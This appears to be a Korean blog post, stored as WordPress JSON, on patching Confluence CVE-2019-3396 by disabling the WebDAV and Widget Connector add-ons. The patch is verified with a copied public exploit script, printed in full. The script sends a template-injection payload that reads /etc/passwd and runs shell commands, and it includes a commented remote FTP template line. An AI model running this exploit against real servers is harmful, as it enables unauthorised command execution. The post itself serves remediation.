{"id":846,"date":"2021-08-16T17:30:55","date_gmt":"2021-08-16T08:30:55","guid":{"rendered":"https:\/\/www.kkoc.org\/?p=846"},"modified":"2021-08-17T00:05:22","modified_gmt":"2021-08-16T15:05:22","slug":"confluence-cve-2019-3396-%ec%b7%a8%ec%95%bd%ec%a0%90-%ec%a1%b0%ec%b9%98","status":"publish","type":"post","link":"https:\/\/www.kkoc.org\/?p=846","title":{"rendered":"confluence CVE-2019-3396 \ucde8\uc57d\uc810 \uc870\uce58"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<h2>confluence CVE-2019-3396 \ucde8\uc57d\uc810<\/h2>\n\n\n\n<p><a href=\"https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.html\" data-type=\"URL\" data-id=\"https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.html\">https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.html<\/a><br>l<\/p>\n\n\n\n<p>Atlassian Confluence\uc5d0 v6.10.0 \uae30\uc900\uc73c\ub85c \uc784\uc2dc\uc870\uce58 \ubc29\ubc95\uc744 \uae30\uc220\ud568.<\/p>\n\n\n\n<p><strong>\ucee8\ud50c\ub8e8\uc5b8\uc2a4 \uad00\ub9ac &gt; \uc560\ub4dc\uc628(Add-on) \uad00\ub9ac \uc120\ud0dd<\/strong><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1024x616.png\" alt=\"\" class=\"wp-image-850\" width=\"1024\" height=\"616\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1024x616.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-300x181.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-768x462.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-80x48.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image.png 1377w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>WebDAV Plugin, Widget Connector \ube44\ud65c\uc131\ud654<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-1024x583.png\" alt=\"\" class=\"wp-image-852\" width=\"1024\" height=\"583\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-1024x583.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-300x171.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-768x438.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1-80x46.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-1.png 1090w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>\ubcf4\uc644 \ucde8\uc57d\uc810 \uc870\uce58 \uc774\uc804<\/strong><\/p>\n\n\n\n<p>&#8220;cat&nbsp;\/etc\/passwd&#8221; &lt;- \uba85\ub839\uc5b4\uac00 \uc2e4\ud589 \ub418\ub294 \ubb38\uc81c\uc810\ub4f1 \uac01\uc885 shell \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uad6c\ub3d9\ud560 \uc218 \uc788\ub294 \ucde8\uc57d\uc810\uc774 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-1024x516.png\" alt=\"\" class=\"wp-image-853\" width=\"1024\" height=\"516\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-1024x516.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-300x151.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-768x387.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-1536x773.png 1536w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2-80x40.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-2.png 1857w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>\ubcf4\uc644 \ucde8\uc57d\uc810 \uc870\uce58 \uc774\ud6c4<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-1024x766.png\" alt=\"\" class=\"wp-image-854\" width=\"1024\" height=\"766\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-1024x766.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-300x224.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-768x574.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-200x150.png 200w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3-80x60.png 80w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2021\/08\/image-3.png 1031w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption>confluence \uc124\uce58\ub41c host\uc5d0\uc11c shell \uba85\ub839\uc5b4\uac00 \uc2e4\ud589 \uc548\ub418\ub294\uac83 \ud655\uc778<\/figcaption><\/figure>\n\n\n\n\n\n<p><strong>\ud14c\uc2a4\ud2b8\uc5d0 \uc0ac\uc6a9\ub41c \ucf54\ub4dc<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/jas502n\/CVE-2019-3396\">https:\/\/github.com\/jas502n\/CVE-2019-3396<\/a><\/p>\n\n\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#coding=utf-8\n\nprint(r'''\n _____              __ _                             ______  _____  _____ \n\/  __ \\            \/ _| |                            | ___ \\\/  __ \\|  ___|\n| \/  \\\/ ___  _ __ | |_| |_   _  ___ _ __   ___ ___   | |_\/ \/| \/  \\\/| |__  \n| |    \/ _ \\| '_ \\|  _| | | | |\/ _ \\ '_ \\ \/ __\/ _ \\  |    \/ | |    |  __| \n| \\__\/\\ (_) | | | | | | | |_| |  __\/ | | | (_|  __\/  | |\\ \\ | \\__\/\\| |___ \n \\____\/\\___\/|_| |_|_| |_|\\__,_|\\___|_| |_|\\___\\___|  \\_| \\_| \\____\/\\____\/ \n                                                                          \n                                By Jas502n\n                                CVE-2019-3396                                          \n                                         \n ''')\nimport os\nimport sys\nimport re\nimport requests\n\n\nurl = \"https:\/\/confluence.kkoc.org\"\ncmd = \"cat \/etc\/passwd\"\n#url = sys.argv[1]\n#cmd = sys.argv[2]\n\nproxies = {\n    \"http\":\"http:\/\/127.0.0.1:8080\",\n    \"https\":\"https:\/\/127.0.0.1:8080\",\n    \"http\":\"socks5h:\/\/127.0.0.1:1080\",\n    \"https\":\"socks5h:\/\/127.0.0.1:1080\"\n}\n\npaylaod = url + \"\/rest\/tinymce\/1\/macro\/preview\"\n\nheaders = {\n    \"User-Agent\": \"Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\",\n    \"Referer\": url + \"\/pages\/resumedraft.action?draftId=1&amp;draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&amp;\",\n    \"Content-Type\": \"application\/json; charset=utf-8\"\n}\n\npyftp = \"file:\/\/\/etc\/passwd\"\n\n#pyftp = \"ftp:\/\/10.10.20.166:8887\/r.vm\"\n\n\ndata = '{\"contentId\":\"1\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https:\/\/www.viddler.com\/v\/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"%s\",\"command\":\"%s\"}}}' % (pyftp,cmd)\nr = requests.post(paylaod, data=data, headers=headers)\n\n# print r.content\nif r.status_code == 200 and \"wiki-content\" in r.text:\n    m = re.findall('.*wiki-content\">\\n(.*)\\n            &lt;\/div>\\n', r.text, re.S)\n    print(\"\\n>>>>Usage: python test.py url cmd \\n\")\n    print(\">>>>Confluence Vuln url:  %s \\n\" %paylaod)\n\n    print('>>>>Command Response:\\n',m[0].strip())   <\/pre>\n","protected":false},"excerpt":{"rendered":"<p>confluence CVE-2019-3396 \ucde8\uc57d\uc810 https:\/\/confluence.atlassian.com\/doc\/confluence-security-advisory-2019-03-20-966660264.htmll Atlassian Confluence\uc5d0 v6.10.0 \uae30\uc900\uc73c\ub85c \uc784\uc2dc\uc870\uce58 \ubc29\ubc95\uc744 \uae30\uc220\ud568. \ucee8\ud50c\ub8e8\uc5b8\uc2a4 \uad00\ub9ac &gt; \uc560\ub4dc\uc628(Add-on) \uad00\ub9ac \uc120\ud0dd WebDAV Plugin, Widget Connector \ube44\ud65c\uc131\ud654 \ubcf4\uc644 \ucde8\uc57d\uc810 \uc870\uce58 \uc774\uc804 &#8220;cat&nbsp;\/etc\/passwd&#8221; &lt;- \uba85\ub839\uc5b4\uac00 \uc2e4\ud589 \ub418\ub294 \ubb38\uc81c\uc810\ub4f1 \uac01\uc885 shell \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uad6c\ub3d9\ud560 \uc218 \uc788\ub294&#8230; <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,2],"tags":[],"_links":{"self":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/846"}],"collection":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=846"}],"version-history":[{"count":5,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/846\/revisions"}],"predecessor-version":[{"id":857,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/846\/revisions\/857"}],"wp:attachment":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=846"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=846"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=846"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}